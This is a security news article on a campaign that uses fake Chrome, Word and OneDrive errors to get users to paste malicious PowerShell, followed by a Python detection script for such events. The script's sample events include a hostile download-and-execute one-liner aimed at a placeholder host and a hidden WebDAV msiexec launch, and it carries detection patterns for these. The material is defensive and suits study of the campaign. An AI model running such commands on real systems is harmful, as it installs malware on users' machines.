Fake Chrome Errors Install Malware via PowerShell Scripts

A recent malware campaign employs deceptive error messages from Google Chrome, Word, and OneDrive to trick users into executing malicious PowerShell scripts that install malware.

This campaign has been linked to various threat actors, including ClearFake, a new attack cluster called ClickFix, and TA571, known for large-scale email spam leading to malware and ransomware infections.

Historically, ClearFake attacks used website overlays prompting users to install fake browser updates that delivered malware. In the current campaign, attackers display fake error messages from Google Chrome, Microsoft Word, and OneDrive, prompting users to copy and run a PowerShell “fix” from their clipboard.

The campaign relies on clever social engineering: the fake error messages present users with a seemingly legitimate problem and a matching solution, prompting them to act without fully considering the risks.

The malware payloads include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer. Three distinct attack chains were identified, differing mainly in their initial stages, with the first not conclusively linked to TA571.

In the first attack chain, associated with ClearFake, users visit a compromised website that loads a malicious script hosted on Binance’s Smart Chain contracts.

This script displays a fake Google Chrome warning, prompting users to install a “root certificate” by running a PowerShell script. Once executed, the script confirms the device is a valid target, flushes the DNS cache, removes clipboard content, displays a decoy message, and downloads additional payloads, including info-stealers.

The second attack chain, linked to the ClickFix campaign, involves compromised websites that inject an iframe overlay displaying another fake Google Chrome error. Users are instructed to open “Windows PowerShell (Admin)” and run the provided code, leading to the same infections.

The third attack chain uses email-based infections with HTML attachments resembling Microsoft Word documents. Users are prompted to install the “Word Online” extension.

The error message provides “How to fix” and “Auto-fix” options, with “How to fix” copying a base64-encoded PowerShell command to the clipboard, and “Auto-fix” displaying a WebDAV-hosted file. Executing these commands downloads and runs MSI or VBS files, resulting in Matanbuchus or DarkGate infections.

In all scenarios, the attackers rely on two things: users' lack of awareness of the risks of running PowerShell commands, and Windows' inability to detect and block the malicious actions initiated by the pasted code. The variety of attack chains shows TA571's ongoing experimentation with different methods to improve effectiveness and widen infection pathways so that more systems are reached.

To avoid falling victim to malware campaigns that use fake Chrome errors and PowerShell scripts, users should be trained to recognize phishing attempts and suspicious error messages. Use browser security extensions that block malicious sites and attachments. Employ advanced email filtering and endpoint protection solutions to detect and block malicious activity before it causes harm.
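The attack chains above share a telemetry footprint that endpoint protection can look for: PowerShell started from an interactive parent such as explorer.exe (a Run dialog or a freshly opened "PowerShell (Admin)" window), a base64-encoded or hidden-window command line, and a decoded body that downloads and executes content, flushes the DNS cache, clears the clipboard, or pulls an MSI from a WebDAV share. The following Python script is an added detection sketch, not code from the article or from any of the vendors it cites; it scores constructed process-creation events (parent image, image, command line) the way a simple EDR rule would. The indicator names, weights, threshold, the `example.invalid` host and the `203.0.113.5` address are all assumptions made for the example.

```python
"""Score process-creation events for clipboard-pasted PowerShell 'fixes'.

Added example (not from the article). Events are (parent_image, image,
command_line) tuples such as an EDR or Sysmon Event ID 1 would provide.
"""
import base64
import re

# Indicators searched in the decoded script body. Names and weights are ours.
BODY_INDICATORS = {
    "download_cradle": (re.compile(
        r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
        r"DownloadFile|Start-BitsTransfer)\b"), 3),
    "dynamic_execution": (re.compile(r"(?i)\b(Invoke-Expression|iex)\b"), 3),
    # The article's first chain flushes DNS and clears the clipboard.
    "dns_flush": (re.compile(r"(?i)(Clear-DnsClientCache|ipconfig\s+/flushdns)"), 2),
    "clipboard_clear": (re.compile(r"(?i)(Set-Clipboard|clip\.exe)"), 2),
    # The third chain ends in MSI or VBS payloads, sometimes hosted on WebDAV.
    "installer_or_script_host": (re.compile(r"(?i)\b(msiexec|wscript|cscript)\b"), 2),
    "webdav_unc": (re.compile(r"(?i)\\\\\S*?(@SSL|DavWWWRoot)"), 2),
}
# -e, -ec, -en, -enc, -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
ALERT_THRESHOLD = 5  # assumed tuning value


def encode_for_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand body, or None if there is none."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(parent_image: str, image: str, command_line: str):
    """Return (score, reasons) for one event; non-PowerShell images score 0."""
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    score, reasons = 0, []
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    if parent in INTERACTIVE_PARENTS:
        score += 1
        reasons.append(f"interactive parent {parent}")
    if HIDDEN_WINDOW.search(command_line):
        score += 1
        reasons.append("hidden window")
    body = command_line
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        score += 2
        reasons.append("base64-encoded command")
        body = decoded  # match indicators against the decoded script, not the blob
    for name, (pattern, weight) in BODY_INDICATORS.items():
        if pattern.search(body):
            score += weight
            reasons.append(name)
    return score, reasons


def scan(events):
    """Return alert records for every event at or above ALERT_THRESHOLD."""
    alerts = []
    for parent, image, cmdline in events:
        score, reasons = analyze_event(parent, image, cmdline)
        if score >= ALERT_THRESHOLD:
            alerts.append({"image": image, "score": score, "reasons": reasons})
    return alerts


# Constructed sample events (hypothetical; not observed data from the article).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PASTED_FIX = ("Clear-DnsClientCache; Set-Clipboard $null; "
              "iex (iwr 'https://example.invalid/fix.ps1' -UseBasicParsing)")
SAMPLE_EVENTS = [
    # 1: user pasted a "fix" into a Run dialog; encoded, hidden, downloads and runs
    (r"C:\Windows\explorer.exe", PS,
     "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_for_powershell(PASTED_FIX)),
    # 2: scheduled inventory script started by a service: benign
    (r"C:\Windows\System32\svchost.exe", PS,
     r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    # 3: admin opened a console and listed a directory: benign
    (r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoExit -Command Get-ChildItem C:\Users"),
    # 4: not PowerShell at all
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),
    # 5: "Auto-fix" style MSI pulled from a WebDAV share
    (r"C:\Windows\explorer.exe", PS,
     r'powershell.exe -w hidden -c "msiexec /i \\203.0.113.5@SSL\DavWWWRoot\update.msi /qn"'),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["score"], alert["image"], ", ".join(alert["reasons"]))
```

Run as a script it prints two alerts: the encoded, clipboard-pasted command (which trips the interactive-parent, hidden-window, encoded-command, download, execution, DNS-flush and clipboard indicators) and the hidden WebDAV `msiexec` launch; the service-launched script and the interactive directory listing stay below the threshold. Decoding the `-EncodedCommand` blob before matching is the important design choice: the indicators in the article's chains (DNS flush, clipboard wipe, download cradle) are invisible in the raw command line.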